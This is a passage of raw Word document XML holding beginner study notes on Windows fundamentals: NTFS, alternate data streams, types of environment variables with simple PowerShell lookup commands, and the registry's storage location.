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43DC6" w14:textId="3D0FE402" w:rsidR="00D25CA5" w:rsidRPr="00D25CA5" w:rsidRDefault="00D25CA5" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="747474" w:themeColor="background2" w:themeShade="80"/>
        </w:rPr>
        <w:t>Windows Understanding</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC9C98C" w14:textId="572B6629" w:rsidR="00D25CA5" w:rsidRPr="00D25CA5" w:rsidRDefault="00D25CA5" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49A0E98C" w14:textId="045C769C" w:rsidR="003274C3" w:rsidRPr="00D25CA5" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>File System:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5214A25E" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="00D25CA5" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">New Technology File System or simply NTFS. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D2C6B63" w14:textId="606D098F" w:rsidR="003274C3" w:rsidRPr="003274C3" w:rsidRDefault="003274C3" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:t xml:space="preserve">Before NTFS, there was FAT16/FAT32 (File Allocation Table) and HPFS (High Performance File System). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C209266" w14:textId="7DC31A97" w:rsidR="003274C3" w:rsidRPr="003274C3" w:rsidRDefault="003274C3" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:t xml:space="preserve">NTFS is known as a journaling file system. In case of a failure, the file system can automatically repair the folders/files on disk using information stored in a log file. This function is not possible with FAT. NTFS </w:t>
      </w:r>
      <w:r w:rsidR="00FE6514" w:rsidRPr="003274C3">
        <w:t>supports</w:t>
      </w:r>
      <w:r w:rsidRPr="003274C3">
        <w:t xml:space="preserve"> Encryption (Encryption File System or EFS)   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389D404D" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="003274C3" w:rsidRDefault="003274C3" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4AF5AFD4" w14:textId="77777777" w:rsidR="003274C3" w:rsidRPr="00D25CA5" w:rsidRDefault="003274C3" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Alternate Data Streams (ADS)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B89D86" w14:textId="36EA0605" w:rsidR="003274C3" w:rsidRPr="003274C3" w:rsidRDefault="003274C3" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:t xml:space="preserve">file </w:t>
      </w:r>
      <w:r w:rsidRPr="00210716">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>attribute</w:t>
      </w:r>
      <w:r w:rsidRPr="003274C3">
        <w:t xml:space="preserve"> only found </w:t>
      </w:r>
      <w:r w:rsidRPr="00210716">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>on the NTFS</w:t>
      </w:r>
      <w:r w:rsidRPr="003274C3">
        <w:t xml:space="preserve"> file system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6815CE8C" w14:textId="7B8D66AD" w:rsidR="003274C3" w:rsidRPr="003274C3" w:rsidRDefault="003274C3" w:rsidP="00210716">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="003274C3">
        <w:t xml:space="preserve">In NTFS, every file consists of several parts called "attributes," and one of these attributes is </w:t>
      </w:r>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:rStyle w:val="codewChar"/>
        </w:rPr>
        <w:t>$</w:t>
      </w:r>
      <w:r w:rsidRPr="003274C3">
        <w:rPr>
          <w:rStyle w:val="codewChar"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Data</w:t>
      </w:r>
      <w:r w:rsidRPr="003274C3">
        <w:t>, which is the main part of a file containing its contents. The primary data stream stores the actual file data, like text in a text file, but there can be other streams attached to the file, called alternate data streams (ADS). consider the main file as the "primary" data stream, and ADS as hidden, secondary sections of the file that can store extra data "not normally visible". meta data is considered ADS Bec it's a data that saved in file beside the main data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="700E3300" w14:textId="77777777" w:rsidR="00210716" w:rsidRDefault="00210716" w:rsidP="003274C3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D12571E" w14:textId="0DC8B38D" w:rsidR="00A44DD5" w:rsidRPr="00D25CA5" w:rsidRDefault="00A44DD5" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="642642A9" w14:textId="55B193A6" w:rsidR="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Environment Variables</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:t xml:space="preserve"> are </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>key-value pairs</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:t xml:space="preserve"> that store important information about the system, user settings, and software configurations. They help programs and scripts interact with the operating system dynamically </w:t>
      </w:r>
      <w:r w:rsidRPr="003D24FC">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>instead of relying on hardcoded values</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8578D6" w14:textId="7A7BE2B0" w:rsidR="00210716" w:rsidRPr="00A44DD5" w:rsidRDefault="00210716" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00210716">
        <w:t>Per </w:t>
      </w:r>
      <w:hyperlink r:id="rId8" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00210716">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>Microsoft </w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00210716">
        <w:t>, " </w:t>
      </w:r>
      <w:r w:rsidRPr="00210716">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">Environment variables store information about the operating system environment. This </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>info</w:t>
      </w:r>
      <w:r w:rsidRPr="00210716">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> includes details </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>like (OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00210716">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve"> path, number of processors used by the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>OS</w:t>
      </w:r>
      <w:r w:rsidRPr="00210716">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>, and the location of temporary folders </w:t>
      </w:r>
      <w:r w:rsidRPr="00210716">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6051C249" w14:textId="4A6628C0" w:rsidR="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Environment</w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:t xml:space="preserve"> variables are stored in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00210716">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Windows Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57347F86" w14:textId="727D7F9B" w:rsidR="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">View </w:t>
      </w:r>
      <w:r w:rsidR="00843C5A">
        <w:t xml:space="preserve">All </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Environment Variables </w:t>
      </w:r>
      <w:r w:rsidR="00843C5A" w:rsidRPr="00843C5A">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00843C5A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>Get-ChildItem Env:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AECAFA6" w14:textId="2100B34F" w:rsidR="00A44DD5" w:rsidRDefault="00843C5A" w:rsidP="00210716">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Specific variable </w:t>
      </w:r>
      <w:r w:rsidRPr="00843C5A">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00843C5A">
        <w:t>echo $env:PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125E1AD3" w14:textId="77777777" w:rsidR="00843C5A" w:rsidRPr="00A44DD5" w:rsidRDefault="00843C5A" w:rsidP="00843C5A">
      <w:pPr>
        <w:pStyle w:val="codew"/>
        <w:ind w:left="720"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C64CE7C" w14:textId="0059396B" w:rsidR="00930FE5" w:rsidRPr="00A44DD5" w:rsidRDefault="003274C3" w:rsidP="00210716">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:rPr>
          <w:rStyle w:val="Heading3Char"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>System Environment</w:t>
      </w:r>
      <w:r w:rsidR="00930FE5" w:rsidRPr="00A44DD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00373742" w14:textId="77777777" w:rsidR="00A44DD5" w:rsidRDefault="00930FE5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Global Variables contain </w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:t>settings and paths in Windows</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A44DD5" w:rsidRPr="00A44DD5">
        <w:t xml:space="preserve">Apply to </w:t>
      </w:r>
      <w:r w:rsidR="00A44DD5" w:rsidRPr="00A44DD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>all users</w:t>
      </w:r>
      <w:r w:rsidR="00A44DD5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE0FA33" w14:textId="34AA316F" w:rsidR="00930FE5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:t xml:space="preserve">Require </w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>administrator privileges</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:t xml:space="preserve"> to modify.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46DA24FC" w14:textId="6668EF72" w:rsidR="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>OS Loads Environment Variables at Startup</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FB44A7C" w14:textId="614FA0D6" w:rsidR="00930FE5" w:rsidRDefault="00930FE5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r>
        <w:t>EX:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="006AE99A" w14:textId="08342B02" w:rsidR="00930FE5" w:rsidRDefault="00930FE5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">If program “X” needs to know </w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>system path (C:\windows)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, instead of defining this path as a hardcoded in program so may be this path changed in another cases, the program can </w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>call the system environment variable %</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>windir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>%</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> that contain the system path so program “X” can use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7B344E" w14:textId="137A8C6C" w:rsidR="00930FE5" w:rsidRDefault="00930FE5" w:rsidP="00210716">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="1440"/>
      </w:pPr>
      <w:r w:rsidRPr="00930FE5">
        <w:t xml:space="preserve">System environment variables apply to all users and processes on the system. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38EC9260" w14:textId="670E07F3" w:rsidR="00930FE5" w:rsidRPr="00930FE5" w:rsidRDefault="00930FE5" w:rsidP="00210716">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1848"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>%WINDIR%</w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Points to the Windows directory (e.g., </w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>C:\Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B832EE" w14:textId="79C84D46" w:rsidR="00930FE5" w:rsidRPr="00930FE5" w:rsidRDefault="00930FE5" w:rsidP="00210716">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="1848"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>%TEMP%</w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Defines the location of temporary files. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FF69DA" w14:textId="05556274" w:rsidR="00930FE5" w:rsidRPr="00930FE5" w:rsidRDefault="00930FE5" w:rsidP="00210716">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="1848"/>
      </w:pPr>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:kern w:val="0"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>%PATH%</w:t>
      </w:r>
      <w:r w:rsidRPr="00930FE5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> → Specifies directories where executables can be found.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FB1F9D" w14:textId="786D64AE" w:rsidR="00930FE5" w:rsidRPr="00D25CA5" w:rsidRDefault="00A44DD5" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>User Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0825C5F8" w14:textId="73254A60" w:rsidR="00A44DD5" w:rsidRPr="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>Apply only to the logged-in user. Users can modify these without admin rights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="187B5074" w14:textId="605587B6" w:rsidR="00A44DD5" w:rsidRPr="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>USERPROFILE</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:t xml:space="preserve">% → User’s home directory (e.g., C:\Users\YourName). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="142D4766" w14:textId="77777777" w:rsidR="00A44DD5" w:rsidRPr="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720" w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>%</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>APPDATA</w:t>
      </w:r>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>% → Location for application data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510B2133" w14:textId="4A79E911" w:rsidR="00A44DD5" w:rsidRPr="00D25CA5" w:rsidRDefault="00A44DD5" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Process Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3305943E" w14:textId="77777777" w:rsidR="00A44DD5" w:rsidRPr="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>Exist only while a process is running.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AB0CEDA" w14:textId="063AA396" w:rsidR="00A44DD5" w:rsidRPr="00D25CA5" w:rsidRDefault="00A44DD5" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Session Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BFC80A5" w14:textId="2F98DCE8" w:rsidR="00A44DD5" w:rsidRPr="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00210716">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00A44DD5">
        <w:t>Like process variables but last for the entire user session.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E42D51A" w14:textId="77777777" w:rsidR="00A44DD5" w:rsidRDefault="00A44DD5" w:rsidP="00A44DD5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="65C4CCA9" w14:textId="6EA1639A" w:rsidR="00A44DD5" w:rsidRPr="00D25CA5" w:rsidRDefault="00843C5A" w:rsidP="00D25CA5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25CA5">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07FEED6B" w14:textId="22F27445" w:rsidR="00A44DD5" w:rsidRDefault="00843C5A" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843C5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Windows Registry is a hierarchical database that stores low-level system settings, configurations, and application preferences </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="003D24FC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>It’s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> the </w:t>
      </w:r>
      <w:r w:rsidRPr="00843C5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>brain of Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C9D05E" w14:textId="7A0A2CCA" w:rsidR="00843C5A" w:rsidRPr="00843C5A" w:rsidRDefault="00843C5A" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00843C5A">
        <w:t>It is loaded into memory when Windows starts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6B45C4" w14:textId="35ACC184" w:rsidR="00843C5A" w:rsidRDefault="00843C5A" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00843C5A">
        <w:t>stored as a set of files on disk, located at</w:t>
      </w:r>
      <w:r w:rsidRPr="00843C5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00843C5A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>C:\Windows\System32\Config\</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7538A148" w14:textId="189031C8" w:rsidR="006D0EC1" w:rsidRDefault="00823102" w:rsidP="00D25CA5">
      <w:pPr>
        <w:ind w:left="720"/>
      </w:pPr>
      <w:r w:rsidRPr="00823102">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Registry</w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:t xml:space="preserve"> is the whole database. </w:t>
      </w:r>
      <w:r w:rsidRPr="00823102">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
